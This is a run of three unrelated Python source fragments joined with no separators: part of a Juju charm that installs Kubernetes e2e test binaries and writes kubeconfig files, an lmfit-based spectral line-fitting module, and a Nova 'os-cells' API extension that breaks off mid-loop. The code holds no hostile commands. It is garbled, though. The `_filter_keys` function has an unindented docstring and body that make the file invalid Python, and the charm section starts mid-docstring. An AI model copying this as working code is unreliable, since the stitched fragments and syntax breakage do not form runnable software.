    charm's resources are unpacked again by install_kubernetes_e2e. '''
    remove_state('kubernetes-e2e.installed')
@when('kubernetes-e2e.installed')
def messaging():
    ''' Probe our relations and surface the proper status message to the
    end user: blocked while required relations are missing, active once
    everything is in place. '''
    # (relation name, reactive state that signals it is available)
    required = (
        ('kubernetes-master', 'kubernetes-master.available'),
        ('certificates', 'certificates.available'),
    )
    missing_services = [name for name, state in required if not is_state(state)]
    if missing_services:
        subject = 'relations' if len(missing_services) > 1 else 'relation'
        services = ','.join(missing_services)
        hookenv.status_set('blocked',
                           'Missing {0}: {1}'.format(subject, services))
        return
    hookenv.status_set('active', 'Ready to test.')
@when_not('kubernetes-e2e.installed')
def install_kubernetes_e2e():
    ''' Deliver the e2e and kubectl components from the binary resource stream
    packages declared in the charm.

    Sets blocked status if the architecture-specific resource is missing,
    errored, or too small to be real; otherwise unpacks it under the charm
    directory, installs the binaries into /usr/local/bin, and raises the
    kubernetes-e2e.installed state. '''
    charm_dir = os.getenv('CHARM_DIR')
    arch = determine_arch()
    # Get the resource via resource_get
    resource = 'e2e_{}'.format(arch)
    try:
        archive = hookenv.resource_get(resource)
    except Exception:
        message = 'Error fetching the {} resource.'.format(resource)
        hookenv.log(message)
        hookenv.status_set('blocked', message)
        return
    if not archive:
        hookenv.log('Missing {} resource.'.format(resource))
        hookenv.status_set('blocked', 'Missing {} resource.'.format(resource))
        return
    # Handle null resource publication, we check if filesize < 1mb
    filesize = os.stat(archive).st_size
    if filesize < 1000000:
        hookenv.status_set('blocked',
                           'Incomplete {} resource.'.format(resource))
        return
    hookenv.status_set('maintenance',
                       'Unpacking {} resource.'.format(resource))
    unpack_path = '{}/files/kubernetes'.format(charm_dir)
    os.makedirs(unpack_path, exist_ok=True)
    cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
    hookenv.log(cmd)
    check_call(cmd)
    # Copy each unpacked binary into the system PATH.
    # NOTE(review): call() ignores install failures; check_call would
    # surface them -- confirm whether best-effort is intended here.
    services = ['e2e.test', 'ginkgo', 'kubectl']
    for service in services:
        unpacked = '{}/{}'.format(unpack_path, service)
        app_path = '/usr/local/bin/{}'.format(service)
        install = ['install', '-v', unpacked, app_path]
        call(install)
    set_state('kubernetes-e2e.installed')
@when('tls_client.ca.saved', 'tls_client.client.certificate.saved',
      'tls_client.client.key.saved', 'kubernetes-master.available',
      'kubernetes-e2e.installed')
@when_not('kubeconfig.ready')
def prepare_kubeconfig_certificates(master):
    ''' Prepare the data to feed to create the kubeconfig file.

    Runs once the TLS client material is saved and the master relation is
    available: writes kubeconfig files for both root and ubuntu pointing at
    the first kubernetes-master endpoint, then sets kubeconfig.ready. '''
    layer_options = layer.options('tls-client')
    # Get all the paths to the tls information required for kubeconfig.
    ca = layer_options.get('ca_certificate_path')
    key = layer_options.get('client_key_path')
    cert = layer_options.get('client_certificate_path')
    servers = get_kube_api_servers(master)
    # pedantry
    kubeconfig_path = '/home/ubuntu/.kube/config'
    # Create kubernetes configuration in the default location for ubuntu.
    create_kubeconfig('/root/.kube/config', servers[0], ca, key, cert,
                      user='root')
    create_kubeconfig(kubeconfig_path, servers[0], ca, key, cert,
                      user='ubuntu')
    # Set permissions on the ubuntu users kubeconfig to ensure a consistent UX
    cmd = ['chown', 'ubuntu:ubuntu', kubeconfig_path]
    check_call(cmd)
    set_state('kubeconfig.ready')
@when('kubernetes-e2e.installed', 'kubeconfig.ready')
def set_app_version():
    ''' Declare the application version to juju.

    Parses the client GitVersion out of `kubectl version --client`; if
    kubectl exits non-zero (e.g. unusable kubeconfig) the version is
    simply left unset. '''
    cmd = ['kubectl', 'version', '--client']
    from subprocess import CalledProcessError
    try:
        version = check_output(cmd).decode('utf-8')
    except CalledProcessError:
        message = "Missing kubeconfig causes errors. Skipping version set."
        hookenv.log(message)
        return
    # Extract e.g. '1.5.2' from '... GitVersion:"v1.5.2", ...'.
    git_version = version.split('GitVersion:"v')[-1]
    version_from = git_version.split('",')[0]
    hookenv.application_version_set(version_from.rstrip())
def create_kubeconfig(kubeconfig, server, ca, key, certificate, user='ubuntu',
                      context='juju-context', cluster='juju-cluster'):
    '''Create a Kubernetes client configuration at `kubeconfig`.

    The cluster entry points at `server` and embeds the CA certificate at
    path `ca`; the user entry embeds the client `key`/`certificate` pair;
    both are tied together in `context`, which is made the active context.

    Argument vectors are built as lists instead of formatting one string
    and word-splitting it with shlex.split(), so paths containing spaces
    are passed through intact.'''
    base = ['kubectl', 'config', '--kubeconfig={}'.format(kubeconfig)]
    # Create the cluster entry with the address of the master server.
    check_call(base + ['set-cluster', cluster,
                       '--server={}'.format(server),
                       '--certificate-authority={}'.format(ca),
                       '--embed-certs=true'])
    # Create the credentials using the client flags.
    check_call(base + ['set-credentials', user,
                       '--client-key={}'.format(key),
                       '--client-certificate={}'.format(certificate),
                       '--embed-certs=true'])
    # Create a default context tying the cluster to the user.
    check_call(base + ['set-context', context,
                       '--cluster={}'.format(cluster),
                       '--user={}'.format(user)])
    # Make the config use this new context.
    check_call(base + ['use-context', context])
def get_kube_api_servers(master):
    '''Return https://host:port endpoints for every unit of every service
    on the kubernetes-master relation.'''
    return ['https://{0}:{1}'.format(unit['hostname'], unit['port'])
            for service in master.services()
            for unit in service['hosts']]
def determine_arch():
    ''' dpkg wrapper to surface the architecture we are tied to.

    Returns e.g. 'amd64' with the trailing newline stripped. '''
    # Fix: strip the dataset-export residue that was fused onto the
    # return line and broke the file's syntax.
    cmd = ['dpkg', '--print-architecture']
    output = check_output(cmd).decode('utf-8')
    return output.rstrip()
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 4 10:35:23 2015
@author: Anton O Lindhal
"""
import numpy as np
import lmfit
from . progress import update_progress
_2pi = 2 * np.pi
_gauss_fwhm_factor = 2 * np.sqrt(2 * np.log(2))
def gaussian(x, amplitude, center, sigma):
    """Gaussian line shape: peaks at `amplitude` when x == center."""
    z = (x - center) / sigma
    return amplitude * np.exp(-0.5 * z * z)
def lorentzian(x, amplitude, center, sigma):
    """Lorentzian line shape with 2*pi-normalized amplitude scaling."""
    denominator = (x - center) ** 2 + sigma ** 2 / 4
    return amplitude / (2 * np.pi) * sigma / denominator
def skewed_gauss_for_500_eV_start_params(x, y, eps=None, bg=False):
    """Build lmfit start parameters for skewed-Voigt fits of 500 eV spectra.

    The first line is seeded at the position of the maximum of ``y``;
    a second line is added when that maximum lies below 15.

    Parameters
    ----------
    x, y : spectrum arrays; only the argmax of ``y`` is used for seeding.
    eps : unused; kept for signature compatibility with the model function.
    bg : when truthy, add a fittable 'bg_factor' parameter.

    Returns
    -------
    lmfit.Parameters
    """
    x0 = x[np.nanargmax(y)]
    n_lines = 1
    if x0 < 15:
        n_lines += 1
    params = lmfit.Parameters()
    if bg:  # idiomatic truth test (was: `bg == True`)
        params.add('bg_factor', 1, min=0, max=3, vary=True)
    params.add('amplitude_1', 7000, min=4000, max=15000)
    params.add('center_1', x0, min=x0*0.9, max=x0*1.1)
    params.add('sigma_1', 0.0001, min=0)
    params.add('gamma_1', 0.4, min=0)
    params.add('skew_1', 0.0, vary=True)
    if 1 < n_lines:
        # Second line seeded 60 % above the main peak.
        x2 = x0 * 1.6
        params.add('amplitude_2', 3000, min=0, max=4000)
        params.add('center_2', x2, min=x2*0.9, max=x2*1.1)
        params.add('sigma_2', 0.1, min=0, max=1)
        params.add('skew_2', 0.0, vary=False)
    return params
def skewed_gauss_for_500_eV(params, x, y=None, eps=None, bg=None):
    """Model/residual function for skewed-Voigt lines on an optional background.

    Returns the model when ``y`` is None, raw residuals when ``eps`` is
    None, otherwise residuals scaled by ``eps``."""
    mod = bg.copy() if bg is not None else np.zeros_like(x)
    if 'bg_factor' in params:
        mod *= params['bg_factor'].value
    line = 1
    # Sum every line_i present in the parameter set.
    while 'center_{}'.format(line) in params:
        amplitude = params['amplitude_{}'.format(line)].value
        center = params['center_{}'.format(line)].value
        sigma = params['sigma_{}'.format(line)].value
        gamma_name = 'gamma_{}'.format(line)
        gamma = params[gamma_name].value if gamma_name in params else None
        skew = params['skew_{}'.format(line)].value
        mod += lmfit.models.skewed_voigt(x, amplitude, center,
                                         sigma, gamma, skew)
        line += 1
    if y is None:
        return mod
    if eps is None:
        return mod - y
    return (mod - y) / eps
def start_params(x=None, y=None, params_in=None, n_lines=2, verbose=False,
                 line_type=None):
    """Construct lmfit start parameters for an n-line fit.

    Parameters
    ----------
    x, y : optional data arrays; when both are given, line 1 is seeded at
        the maximum of ``y``, and for n_lines > 2 the allowed center range
        is derived from where ``y`` exceeds 1/20 of its maximum.
    params_in : optional lmfit.Parameters, or list of them, whose values
        are copied (or stderr-weight-averaged) into the fresh set.
    n_lines : number of lines to create parameters for.
    verbose : print diagnostic output while seeding.
    line_type : 'voigt' would enable the (currently commented-out)
        voigt-specific parameters.

    Returns
    -------
    lmfit.Parameters
    """
    params = lmfit.Parameters()
    params.add('amplitude_1', 20, min=0)
    params.add('center_1', value=15)
    params.add('sigma_1', value=0.4, min=0)
    if line_type == 'voigt':
        pass
        # params.add('gamma_1', value=0.4e-3, min=0)
        # params['sigma_1'].value *= 1e-3
        # params.add('skew_1', value=0)
    if n_lines > 1:
        # Line 2 is tied to line 1 via an amplitude ratio and center offset.
        params.add('amp_ratio', value=1, min=0)
        params.add('amplitude_2', expr='amplitude_1 * amp_ratio')
        params.add('center_diff', value=1, min=0.5)
        params.add('center_2', expr='center_1 + center_diff')
        params.add('sigma_2', value=0.4, min=0)
        if line_type == 'voigt':
            pass
            # params.add('gamma_2', value=0.4e-3, min=0)
            # params['sigma_2'].value *= 1e-3
            # params.add('skew_2', value=0)
    for i_line in range(3, n_lines+1):
        params.add('amplitude_{}'.format(i_line), 20, min=0)
        params.add('center_{}'.format(i_line), value=11)
        params.add('sigma_{}'.format(i_line), value=0.5, min=0)
        if line_type == 'voigt':
            pass
            # params.add('gamma_{}'.format(i_line), value=0.5, min=0)
            # params['sigma_{}'.format(i_line)].value *= 1e-7
            # params.add('skew_{}'.format(i_line), value=0)
    # if n_lines > 2:
    #     print('Warning: Only one or two lines implemented in start_params().',
    #     print('Using two lines.'
    if (x is not None) and (y is not None):
        # Seed line 1 on the data maximum.
        max_idx = np.argmax(y)
        y_max = y[max_idx]
        if verbose:
            print('y_max =', y_max)
        params['amplitude_1'].value = y_max
        params['center_1'].value = x[max_idx]
        if n_lines > 2:
            # Restrict center_1 / center_diff to the region where the
            # signal exceeds 5 % of the maximum (scanned from both ends).
            for i in range(max_idx):
                if verbose:
                    print('y[i] =', y[i], 'y_max =', y_max)
                if y[i] >= float(y_max) / 20:
                    params['center_1'].min = x[i]
                    if verbose:
                        print('i =', i)
                    break
            for i in range(len(x)-1, max_idx-1, -1):
                if y[i] > float(y_max) / 20:
                    if verbose:
                        print('x[i] =', x[i],
                              'params["center_1"].min = {}'.format(
                                  params['center_1'].min))
                    params['center_diff'].max = x[i] - params['center_1'].min
                    params['center_diff'].value = params['center_diff'].max / 2
                    break
    if isinstance(params_in, lmfit.parameter.Parameters):
        # Copy over any matching start values supplied by the caller.
        for k in params_in:
            if k in params:
                params[k].value = params_in[k].value
    if isinstance(params_in, list):
        if np.all([isinstance(par, lmfit.parameter.Parameters) for
                   par in params_in]):
            # Average each value over the given parameter sets, weighting
            # by the inverse of the reported standard error.
            for k in params:
                params[k].value = np.average(
                    [par[k].value for par in params_in if par[k].stderr != 0],
                    weights=[1./par[k].stderr for par in params_in
                             if par[k].stderr != 0])
    return params
def n_line_fit_model(params, x, data=None, eps_data=None,
                     line_type='voigt'):
    """Sum of n spectral lines; returns model, residual, or scaled residual.

    Lines are read from ``params`` as amplitude_i/center_i/sigma_i (plus
    optional gamma_i and skew_i) for i = 1, 2, ... until an index is
    missing.  ``line_type`` selects 'gaussian', 'lorentzian' or 'voigt'.

    Returns the model when ``data`` is None, ``model - data`` when
    ``eps_data`` is None, otherwise ``(model - data) / eps_data``.

    Raises TypeError for an unknown ``line_type`` (previously this was
    silently swallowed by a bare ``except: break`` that doubled as the
    loop terminator, making typos return an all-zero model).
    """
    model = np.zeros_like(x)
    i = 1
    # Iterate explicitly over the defined line indices instead of relying
    # on a bare except to terminate the loop.
    while 'amplitude_{}'.format(i) in params:
        amplitude = params['amplitude_{}'.format(i)].value
        center = params['center_{}'.format(i)].value
        sigma = params['sigma_{}'.format(i)].value
        gamma_str = 'gamma_{}'.format(i)
        skew_str = 'skew_{}'.format(i)
        gamma = params[gamma_str].value if gamma_str in params else None
        skew = params[skew_str].value if skew_str in params else 0
        if line_type == 'gaussian':
            model += gaussian(x, amplitude, center, sigma)
        elif line_type == 'lorentzian':
            model += lorentzian(x, amplitude, center, sigma)
        elif line_type == 'voigt':
            model += lmfit.models.skewed_voigt(x, amplitude, center,
                                               sigma, gamma, skew)
        else:
            raise TypeError('No model named ', line_type, ' avaliable.')
        i += 1
    if data is None:
        return model
    if eps_data is None:
        return model - data
    return (model - data) / eps_data
def n_voigt_with_bg_model(params, x, data=None, eps_data=None, bg=None):
    """Up to three skewed-Voigt lines on top of an optional background.

    Parameters
    ----------
    params : lmfit.Parameters or mapping of objects with a ``.value``
        Line ``i`` (1-3) requires ``amplitude_i``, ``center_i``,
        ``sigma_i`` and ``gamma_i``.  An optional ``bg_factor``
        parameter scales the background.
    x : ndarray
        Abscissa values where the model is evaluated.
    data : ndarray, optional
        If given, the raw residual ``model - data`` is returned.
    eps_data : ndarray, optional
        If given together with ``data``, the residual is scaled as
        ``(model - data) / eps_data``.
    bg : ndarray, optional
        Background shape; a flat background of ones is used when
        ``bg_factor`` is present but no shape was provided.

    Returns
    -------
    ndarray
        Model, raw residual, or error-scaled residual (see above).
    """
    # Optional background: a measured shape scaled by 'bg_factor'.
    if 'bg_factor' in params:
        if bg is None:
            bg = np.ones_like(x)
        model = params['bg_factor'].value * bg
    else:
        model = np.zeros_like(x)
    # Add the voigt shaped photo lines; stop at the first index whose
    # parameters are missing.  Catching only KeyError (instead of the
    # previous bare except) keeps real errors from skewed_voigt visible.
    for i in range(3):
        try:
            amplitude = params['amplitude_{}'.format(i + 1)].value
            center = params['center_{}'.format(i + 1)].value
            sigma = params['sigma_{}'.format(i + 1)].value
            gamma = params['gamma_{}'.format(i + 1)].value
        except KeyError:
            break
        model += lmfit.models.skewed_voigt(x, amplitude, center, sigma,
                                           gamma)
    if data is None:
        return model
    if eps_data is None:
        return model - data
    return (model - data) / eps_data
def n_voigt_with_bg_start_params(x=None, y=None, n_lines=2, bg=False):
    """Build lmfit starting parameters for up to three Voigt lines.

    Parameters
    ----------
    x, y : ndarray, optional
        When both are given, the first line center is seeded at the
        position of the maximum of ``y``.
    n_lines : int
        Number of lines (1-3) to create parameters for.
    bg : bool
        When True, add a 'bg_factor' parameter for a scaled background.

    Returns
    -------
    lmfit.Parameters
    """
    params = lmfit.Parameters()
    # First (main) line.
    params.add('amplitude_1', 8e3, min=0)
    params.add('center_1', value=16.5)
    params.add('sigma_1', value=1e-3, min=0, max=1)
    params.add('gamma_1', value=0.4, min=0, max=1)
    # Put the first center at the data maximum when data is supplied.
    if (x is not None) and (y is not None):
        params['center_1'].value = x[np.nanargmax(y)]
    if bg:
        params.add('bg_factor', value=1, min=0.0, max=1.5)
    if n_lines >= 2:
        # Second line: start slightly weaker and above the first one.
        params.add('amplitude_2',
                   value=params['amplitude_1'].value * 0.7,
                   min=0)
        params.add('center_2',
                   value=params['center_1'].value * 1.09,
                   min=14, max=22)
        params.add('sigma_2', value=1e-4, min=0, max=1)
        params.add('gamma_2', value=0.4, min=0, max=1)
    if n_lines >= 3:
        # Third line with a tightly constrained center.
        params.add('amplitude_3', 2e3, min=0)
        params.add('center_3', value=11.6, max=12, min=11.2)
        params.add('sigma_3', value=1e-4, min=0, max=1)
        params.add('gamma_3', value=0.4, min=0, max=1)
    return params
def n_voight_with_bg_500_eV_start_params(x, y):
    """Start parameters tuned for the 500 eV setting.

    The number of lines is picked from the position of the data
    maximum, then every line center (with +-10 % bounds) and amplitude
    is re-seeded relative to that maximum.
    """
    peak_pos = x[np.nanargmax(y)]
    # The lower the maximum sits, the more lines are expected.
    n_lines = 1
    if peak_pos < 15:
        n_lines += 1
    if peak_pos < 11.5:
        n_lines += 1
    params = n_voigt_with_bg_start_params(x, y, n_lines=n_lines, bg=False)
    params['center_1'].value = peak_pos
    if 'center_2' in params:
        params['center_2'].value = peak_pos * 1.5
    if 'center_3' in params:
        params['center_3'].value = peak_pos * 2.0
    centers = [peak_pos, peak_pos * 1.55, peak_pos * 2]
    amplitudes = [15000, 1000, 10]
    for line, (center, amplitude) in enumerate(zip(centers, amplitudes), 1):
        name = 'center_{}'.format(line)
        if name not in params:
            continue
        par = params[name]
        par.min = center * 0.9
        par.max = center * 1.1
        par.value = center
        params['amplitude_{}'.format(line)].value = amplitude
    return params
def poly_line(params, x, y=None, err=None):
    """Evaluate a polynomial with coefficients 'a_0' ... 'a_{n-1}'.

    Parameters
    ----------
    params : mapping
        One entry per coefficient, keyed 'a_0', 'a_1', ...
    x : ndarray
        Points where the polynomial is evaluated.
    y : ndarray, optional
        If given, the raw residual ``model - y`` is returned.
    err : ndarray, optional
        If given together with ``y``, the residual is scaled by it.

    Returns
    -------
    ndarray
        Model, raw residual, or error-scaled residual.
    """
    mod = np.zeros_like(x)
    for power in range(len(params)):
        mod += params['a_{}'.format(power)] * x ** power
    if y is None:
        return mod
    if err is None:
        return mod - y
    return (mod - y) / err
def line_start_params(a_list):
    """Build lmfit Parameters 'a_0' ... 'a_{n-1}' from coefficients.

    Parameters
    ----------
    a_list : list
        Starting value for each polynomial coefficient.

    Returns
    -------
    lmfit.Parameters

    Raises
    ------
    TypeError
        If ``a_list`` is not a list.
    """
    if not isinstance(a_list, list):
        # The old message named a non-existent function
        # ('linse_start_params'); report the real name.
        raise TypeError('Function line_start_params expected a list'
                        ' as input parameter, got {}.'.format(type(a_list)))
    params = lmfit.Parameters()
    for i, a in enumerate(a_list):
        params.add('a_{}'.format(i), value=a)
    return params
def r_to_e_conversion(params, r, e=None):
    """Radius-to-energy model: E0 + a*(r - r0) + b*(1/r - 1/r0).

    Returns the model when ``e`` is None, otherwise the residual
    ``model - e``.
    """
    r0 = params['r0'].value
    e0 = params['E0'].value
    linear_part = params['a'].value * (r - r0)
    inverse_part = params['b'].value * (1/r - 1/r0)
    model = e0 + linear_part + inverse_part
    if e is None:
        return model
    return model - e
def r_to_e_conversion_start_params(r=None, e=None):
    """Starting parameters for :func:`r_to_e_conversion`.

    Parameters
    ----------
    r : sequence, optional
        Unused; kept for signature symmetry with the fit data.
    e : ndarray, optional
        Energy values; when given and non-empty their mean seeds 'E0'.

    Returns
    -------
    lmfit.Parameters
    """
    # The mutable default arguments (r=[], e=[]) were replaced by None
    # to avoid the shared-default pitfall; behaviour is unchanged for
    # every existing caller.
    params = lmfit.Parameters()
    params.add('r0', 15, vary=False)
    params.add('E0', e.mean() if e is not None and len(e) > 0 else 350)
    params.add('a', 1)
    params.add('b', 1)
    return params
def get_params_and_funktion(setting, gas, x, y, bg=None):
    """Select fit function, start parameters and minimizer options.

    Parameters
    ----------
    setting : int
        Spectrometer setting (500 selects a dedicated N2 model).
    gas : {'Kr', 'N2'}
        Target gas.  Any other value raises ValueError (the old code
        crashed with an UnboundLocalError instead).
    x, y : ndarray
        Data used to seed the start parameters.
    bg : ndarray, optional
        Background shape for the N2 models.

    Returns
    -------
    tuple
        ``(params, fit_funk, kws, method)`` ready for lmfit.minimize().
    """
    if gas == 'Kr':
        kws = {'line_type': 'voigt'}
        params = start_params(x, y, n_lines=2, **kws)
        fit_funk = n_line_fit_model
    elif gas == 'N2':
        kws = {'bg': bg}
        # get start parameters
        if setting == 500:
            params = skewed_gauss_for_500_eV_start_params(
                x, y, bg=True)
            fit_funk = skewed_gauss_for_500_eV
            # The 500 eV model is used without skew: freeze it.
            for k, v in params.items():
                if k.startswith('skew'):
                    v.value = 0
                    v.vary = False
        else:
            params = n_voigt_with_bg_start_params(x, y, n_lines=1,
                                                  bg=True)
            if 'bg_factor' in params:
                params['bg_factor'].vary = False
            fit_funk = n_voigt_with_bg_model
    else:
        raise ValueError(
            'Unknown gas {!r}; expected "Kr" or "N2".'.format(gas))
    # The method name was misspelled 'powel'; lmfit's prefix matching
    # happened to accept it, but spell the scipy method out properly.
    return params, fit_funk, kws, 'powell'
def find_lines(rth_image, r_axis_mm, th_axis_rad,
               setting,
               n_lines_fit=2, n_lines_store=2,
               bg=None, gas='Kr', return_line_params_list=False,
               verbose=False):
    """Fit line centers, widths and amplitudes for each angle bin.

    The r projection of ``rth_image`` is fitted first; its result then
    seeds a per-angle fit whose parameters are collected and returned.

    Returns
    -------
    r, w, a : ndarray, shape (n_th, n_lines_store)
        Line centers, sigma-like widths and amplitudes per angle bin.
    red_chi2 : ndarray, shape (n_th,)
        Reduced chi^2 of each per-angle fit.
    line_params_list : list, optional
        The per-angle lmfit parameters (only when requested).
    """
    # Fit to r projection
    r_projection = rth_image.sum(axis=0)
    params_r_proj_initial, fit_funk, kws, method = get_params_and_funktion(
        setting, gas, r_axis_mm, r_projection, bg)
    r_proj_result = lmfit.minimize(fit_funk, params_r_proj_initial,
                                   method=method,
                                   args=(r_axis_mm, r_projection), kws=kws)
    # Fit for each line based on the r projection fit
    line_params_list = []
    line_results_list = []
    n_th = len(th_axis_rad)
    # Make space for the results in a nicer format
    r = np.empty((n_th, n_lines_store), dtype=float)
    w = np.empty_like(r)
    a = np.empty_like(r)
    red_chi2 = np.empty(n_th)
    # Get a fresh set of initial parameters.  The original statement
    # "line_initial_params, ... = get_params_and_funktion(...)" was a
    # SyntaxError: '...' is not a valid assignment target.
    line_initial_params, _, _, _ = get_params_and_funktion(
        setting, gas, r_axis_mm, r_projection, bg)
    for i_th in range(n_th):
        # map some stuff from the full projection to each line
        amp_scaling = rth_image[i_th, :].sum() / r_projection.sum()
        for k, v in line_initial_params.items():
            v.value = r_proj_result.params[k].value
            if k.startswith(('amp', 'bg')):
                v.value *= amp_scaling
                v.min *= amp_scaling
                v.max *= amp_scaling
            if k.startswith('skew'):
                v.vary = False
        # Fit this angle bin with the same model that was used for the
        # projection fit (the original referenced an undefined name
        # "model" here).
        line_results_list.append(
            lmfit.minimize(fit_funk,
                           line_initial_params, method=method,
                           args=(r_axis_mm, rth_image[i_th, :]),
                           kws=kws))
        line_params_list.append(line_results_list[-1].params)
        for line in range(n_lines_store):
            r[i_th, line] = line_params_list[-1][
                'center_{}'.format(line+1)].value
            # Width via the Voigt FWHM approximation, see
            # https://en.wikipedia.org/wiki/Voigt_profile
            fg = (line_params_list[-1]['sigma_{}'.format(line+1)].value
                  * _gauss_fwhm_factor)
            try:
                fl = (line_params_list[-1][
                    'gamma_{}'.format(line+1)].value * 2)
                w[i_th, line] = (0.5346 * fl +
                                 np.sqrt(0.2166 * fl**2 + fg**2)) / 2
            except KeyError:
                # No Lorentzian part for this line: pure Gaussian width.
                w[i_th, line] = fg / 2
            w[i_th, line] /= _gauss_fwhm_factor
            a[i_th, line] = line_params_list[-1][
                'amplitude_{}'.format(line+1)].value
        red_chi2[i_th] = line_results_list[-1].redchi
        update_progress(i_th, n_th, verbose=verbose)
    if verbose:
        print('')
        lmfit.report_fit(line_results_list[len(line_results_list)//2])
    if return_line_params_list:
        return r, w, a, red_chi2, line_params_list
    return r, w, a, red_chi2
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_utils import strutils
import six
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.schemas.v3 import cells
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova.cells import rpcapi as cells_rpcapi
from nova import exception
from nova.i18n import _
from nova import rpc
CONF = cfg.CONF
# Pull in the cells options defined in nova.cells.opts so the local
# cell's name and capabilities can be read below.
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
ALIAS = "os-cells"
# Policy-check callable for this extension; invoked in every action.
authorize = extensions.os_compute_authorizer(ALIAS)
def _filter_keys(item, keys):
"""Filters all model attributes except for keys
item is a dict
"""
return {k: v for k, v in item.iteritems() if k in keys}
def _fixup_cell_info(cell_info, keys):
    """If the transport_url is present in the cell, derive username,
    rpc_host, and rpc_port from it.
    """
    if 'transport_url' not in cell_info:
        return
    # Take the URL out of the result and break it apart.
    url_string = cell_info.pop('transport_url')
    try:
        parsed_url = rpc.get_transport_url(url_string)
    except messaging.InvalidTransportURL:
        # Unparsable URL: fall back to None for every derived field.
        for key in keys:
            cell_info.setdefault(key, None)
        return
    if not parsed_url.hosts:
        return
    first_host = parsed_url.hosts[0]
    # cell_info keys -> TransportHost attribute names.
    attr_for_key = {'rpc_host': 'hostname', 'rpc_port': 'port'}
    for key in keys:
        if key not in cell_info:
            cell_info[key] = getattr(first_host, attr_for_key.get(key, key))
def _scrub_cell(cell, detail=False):
    """Reduce a cell dict to its API-visible fields.

    Derives the rpc connection details from the transport URL and tags
    the cell as 'parent' or 'child' relative to this cell.
    """
    keys = ['name', 'username', 'rpc_host', 'rpc_port']
    if detail:
        keys.append('capabilities')
    cell_info = _filter_keys(cell, keys + ['transport_url'])
    _fixup_cell_info(cell_info, keys)
    if cell['is_parent']:
        cell_info['type'] = 'parent'
    else:
        cell_info['type'] = 'child'
    return cell_info
class CellsController(wsgi.Controller):
    """Controller for Cell resources."""
    def __init__(self):
        # RPC client used for all communication with the cells service.
        self.cells_rpcapi = cells_rpcapi.CellsAPI()
    def _get_cells(self, ctxt, req, detail=False):
        """Return all cells."""
        # Ask the CellsManager for the most recent data
        items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
        # Honor pagination (limit/offset/marker) from the request.
        items = common.limited(items, req)
        items = [_scrub_cell(item, detail=detail) for item in items]
        return dict(cells=items)
    @extensions.expected_errors(501)
    @common.check_cells_enabled
    def index(self, req):
        """Return all cells in brief."""
        ctxt = req.environ['nova.context']
        authorize(ctxt)
        return self._get_cells(ctxt, req)
    @extensions.expected_errors(501)
    @common.check_cells_enabled
    def detail(self, req):
        """Return all cells in detail."""
        ctxt = req.environ['nova.context']
        authorize(ctxt)
        return self._get_cells(ctxt, req, detail=True)
    @extensions.expected_errors(501)
    @common.check_cells_enabled
    def info(self, req):
        """Return name and capabilities for this cell."""
        context = req.environ['nova.context']
        authorize(context)
        cell_capabs = {}
        my_caps = CONF.cells.capabilities
        # Capabilities are configured as "key=value" strings; expose
        # them through the API as a dict.
        for cap in my_caps:
            key, value = cap.split('=')
            cell_capabs[key] = value
        cell = {'name': CONF.cells.name,
                'type': 'self',
                'rpc_host': None,
                'rpc_port': 0,
                'username': None,
                'capabilities': cell_capabs}
        return dict(cell=cell)
    @extensions.expected_errors((404, 501))
    @common.check_cells_enabled
    def capacities(self, req, id=None):
        """Return capacities for a given cell or all cells."""
        # TODO(kaushikc): return capacities as a part of cell info and
        # cells detail calls in v3, along with capabilities
        context = req.environ['nova.context']
        authorize(context)
        try:
            capacities = self.cells_rpcapi.get_capacities(context,
                                                          cell_name=id)
        except exception.CellNotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        return dict(cell={"capacities": capacities})
    @extensions.expected_errors((404, 501))
    @common.check_cells_enabled
    def show(self, req, id):
        """Return data about the given cell name. 'id' is a cell name."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            cell = self.cells_rpcapi.cell_get(context, id)
        except exception.CellNotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        return dict(cell=_scrub_cell(cell))
    # NOTE(gmann): Returns 200 for backwards compatibility but should be 204
    # as this operation complete the deletion of aggregate resource and return
    # no response body.
    @extensions.expected_errors((403, 404, 501))
    @common.check_cells_enabled
    def delete(self, req, id):
        """Delete a child or parent cell entry. 'id' is a cell name."""
        context = req.environ['nova.context']
        # Both the blanket policy and the delete-specific policy must pass.
        authorize(context)
        authorize(context, action="delete")
        try:
            num_deleted = self.cells_rpcapi.cell_delete(context, id)
        except exception.CellsUpdateUnsupported as e:
            raise exc.HTTPForbidden(explanation=e.format_message())
        if num_deleted == 0:
            raise exc.HTTPNotFound(
                explanation=_("Cell %s doesn't exist.") % id)
    def _normalize_cell(self, cell, existing=None):
        """Normalize input cell data. Normalizations include:
        * Converting cell['type'] to is_parent boolean.
        * Merging existing transport URL with transport information.
        """
        # Start with the cell type conversion
        if 'type' in cell:
            cell['is_parent'] = cell['type'] == 'parent'
            del cell['type']
        # Avoid cell type being overwritten to 'child'
        elif existing:
            cell['is_parent'] = existing['is_parent']
        else:
            cell['is_parent'] = False
        # Now we disassemble the existing transport URL...
        transport_url = existing.get('transport_url') if existing else None
        transport_url = rpc.get_transport_url(transport_url)
        if 'rpc_virtual_host' in cell:
            transport_url.virtual_host = cell.pop('rpc_virtual_host')
        # Ensure there is at least one host entry to write fields onto.
        if not transport_url.hosts:
            transport_url.hosts.append(messaging.TransportHost())
        transport_host = transport_url.hosts[0]
        if 'rpc_port' in cell:
            cell['rpc_port'] = int(cell['rpc_port'])
        # Copy over the input fields
        transport_field_map = {
            'username': 'username',
            'password': 'password',
            'hostname': 'rpc_host',
            'port': 'rpc_port',
        }
        for key, input_field in transport_field_map.items():
            # Only override the value if we're given an override
            if input_field in cell:
